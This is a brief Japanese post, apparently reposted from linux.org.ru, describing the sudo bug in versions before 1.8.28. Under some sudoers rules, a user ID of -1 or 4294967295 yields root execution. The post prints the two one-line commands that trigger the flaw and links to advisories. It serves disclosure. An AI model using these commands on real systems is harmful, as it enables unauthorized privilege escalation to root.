sudo の脆弱性

sudo のバグにより、/etc/sudoers が他のユーザーとしての実行を許可し、root での実行が禁止されている場合、任意の実行可能ファイルを root として実行できます。

このエラーを悪用するのは非常に簡単です。

sudo -u#-1 id -u

または

sudo -u#4294967295 id -u

このバグは 1.8.28 より前のすべてのバージョンの sudo に存在します。

詳細:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

出所: linux.org.ru

コメントを追加します